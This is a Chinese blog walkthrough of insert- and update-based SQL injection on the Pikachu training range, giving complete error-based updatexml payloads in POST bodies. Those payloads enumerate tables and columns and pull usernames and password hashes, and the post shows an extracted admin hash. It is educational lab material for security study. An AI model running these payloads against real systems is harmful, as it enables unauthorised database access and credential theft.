[Pikachu靶场实战系列] SQL注入(insert/update注入)

最新推荐文章于 2024-05-21 09:31:53 发布
最新推荐文章于 2024-05-21 09:31:53 发布
阅读量3.4k 收藏 26
点赞数 3
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/119186749
版权

目录

insert注入

在这里插入图片描述
发现有个注册页面,注册页面如果有注入漏洞的话,一般是insert类型的,因为注册相当于往数据库的表中插入一行新数据

填写注册信息,然后抓个包,可以看到时post形式传输的数据
在这里插入图片描述
尝试在admiin后加单引号,报错了而且报错信息中没有出现admiin,可能是单引号完成闭合了,最后还需要加个)完成闭合
在这里插入图片描述
添加其他参数和)构建闭合

username=admiin’,‘111’,‘222’,‘333’,‘444’,‘555’)#

在这里插入图片描述
构建好闭合了,但是这个注册页面是没有回显的,怎样查询数据呢,我们可以采用报错注入的形式让查询的数据显示在报错页面中
在这里插入图片描述
完整提交的post数据,payload里面是or或者and都可以,注意最后可以不用注释符,把第一个参数的单引号闭合就可以了

username=admiin’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) or’ &password=admin&sex=11&phonenum=111&email=1111&add=11111&submit=submit

在这里插入图片描述
然后就是替换database(),查询其他数据

下面查询的长度超出updatexml函数的显示范围了(显示32个字符),需要在payload中加substr()函数来把剩下的字符显示出来,拼接起来就是查询出的数据

查询表

username=’ or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or’ &password=admin&sex=11&phonenum=111&email=1111&add=11111&submit=submit

在这里插入图片描述
明显最后一个表没有查询完整,调整一下pyload中的值

username=’ or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),32,31),0x7e),1) or’ &password=admin&sex=11&phonenum=111&email=1111&add=11111&submit=submit

在这里插入图片描述
两次拼接起来,查询到的完整表名为

httpinfo,member,message,users,xssblind

查询user表的列

username= ’ or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’),1,31),0x7e),1) or ’ &password=admin&sex=11&phonenum=111&email=1111&add=11111&submit=submit

在这里插入图片描述

username= ’ or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’),32,31),0x7e),1) or ’ &password=admin&sex=11&phonenum=111&email=1111&add=11111&submit=submit

在这里插入图片描述

username= ’ or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’),63,31),0x7e),1) or ’ &password=admin&sex=11&phonenum=111&email=1111&add=11111&submit=submit

在这里插入图片描述
三次拼接起来,users表中完整的列为:

USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level

查询users表中password列的数据

username= ’ or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,’;’,password)) from users),1,31),0x7e),1) or ’ &password=admin&sex=11&phonenum=111&email=1111&add=11111&submit=submit

在这里插入图片描述

username= ’ or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,’;’,password)) from users),32,31),0x7e),1) or ’ &password=admin&sex=11&phonenum=111&email=1111&add=11111&submit=submit

在这里插入图片描述
两次拼接起来,可以得到admin的密码

admin;e10adc3949ba59abbe56e057f20f883e

Update注入

先随便注册一个号,登录进去
在这里插入图片描述
点击修改信息
在这里插入图片描述
随便输入信息,点击submit抓包
在这里插入图片描述
在性别中加入单引号报错
加粗样式
构造pyload

sex=1’or updatexml(1,concat(0x7e,database()),0) or’&phonenum=1111111111&add=11111&email=11111&submit=submit

在这里插入图片描述
获取其他数据方式参考insert注入方式

00勇士王子
关注
  • 3
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入 pikachu post数字型注入
08-12
sql注入 pikachu post数字型注入
pikachu靶场sql注入 insert/update
weixin_54431413的博客
03-14 4400
pikachu里的update/insert注入 2.对红色圈圈里所提交的参数进行注入 3.常用函数符号 (1)0x7e表示 ~符号 (2)database()显示出数据库名字 (3)version()显示出版本号 (4)user()显示出用户名 ...
在进行SQL注入时遇到UPDATE语句时注意事项
最新发布
banliyaoguai的博客
05-21 313
例如,将一个字符串值与一个 DOUBLE 类型的列进行比较或运算,或者将一个非数字字符串转换为 DOUBLE 类型时。但是有一种情况,就是里面注入的sql语句如果时系统函数的话,他是可以显示出系统函数的结果的,原因就是系统函数的优先级比较高,Mysql在发现系统函数的话就会执行系统函数。若使用下列代码,会出现不报错也不显示的结果。在update进行判断时他会将下面的语句用括号括起来然后再进行判断,下列语句在遇到1的时候就判断正确。在注入注入语句应该如下图,要使用1和报错函数连接。
pikachu注入insert注入
2201_75756681的博客
03-29 474
漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。我们爆出来数据库名后就是要开始爆表名了列名同理,但是提醒一点就是列名可能有多个加group_concat参数结果可能会被截断所以要加上limit。在网上经过查找资料发现insert注入几乎写的不全,自己复制后发现注入语句错误,使得自己还要更改,现在更新一篇insert注入的过程。最后开始爆数据爆username的数据。第三步就是开始我们的注入 了。
SQL注入_insert&delete&update&selete
weixin_48131633的博客
10-26 4784
SQL注入_insert&delete&update&selete
Pikachu的”insert/update注入
weixin_50339082的博客
06-15 2265
Pikachu的”insert/update注入 一、相关函数 UpdateXML(xml_target,xpath_expr,new_xml) #此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。 #xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。 #如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_targetXML片段。 #所有三个参数都应为字符串。 E
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 5万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2484
Pikachu-----Sql Inject(SQL注入
Pikachu SQL注入insert/update注入
SS_liang的博客
01-11 1596
updateXML函数是一种在XML文档中修改或更新指定节点的方法。它在许多编程语言和XML处理库中都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场包含网络安全中常见的漏洞
11-08
pikachu靶场通关包含网络安全中常见的漏洞、XSS、SQL注入、目录遍历、文件上传、文件包含、远程执行等常见的漏洞都集成在此靶场的源码上!!
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
渗透测试:详解sqlmap进行POST注入、基于insert注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4551
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
25-5 SQL 注入攻击 - insert注入
weixin_43263566的博客
03-09 399
流量分析主要涵盖三个方面:报错注入、函数注入和盲注。这些都是 SQL 注入攻击的常见形式,而工具如 SQLMap 可用于检测和利用这些漏洞。注入手段:使用or逻辑运算符。使用pikachu靶场练习。
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 758
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入
一文了解pikachuSQL注入
allintao的博客
03-01 2638
本文章主要讲解关于pikachu注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
SQL注入UPDATEinsert、delete注入
07-08 3227
SQL注入
insert/update注入
Ethan024的博客
03-30 967
insert/update注入 实验环境: 皮卡丘靶场insert/update注入 原理: insert注入(注册新用户): 后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(userna
pikachu靶场insert/update注入
10-21
pikachu靶场是一个专门用于测试SQL注入漏洞的靶场,其中包括了insert/update注入。在pikachu靶场中,insert/update注入漏洞通常出现在用户注册、登录、修改个人信息等功能中。攻击者可以通过构造恶意的SQL语句,将恶意代码注入到数据库中,从而实现对数据库的非法操作,比如获取敏感信息、篡改数据等。在pikachu靶场中,可以通过构造类似于引用中的payload来进行insert/update注入漏洞的测试。需要注意的是,在进行SQL注入测试时,一定要遵循合法、合规的测试流程,避免对目标系统造成不必要的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值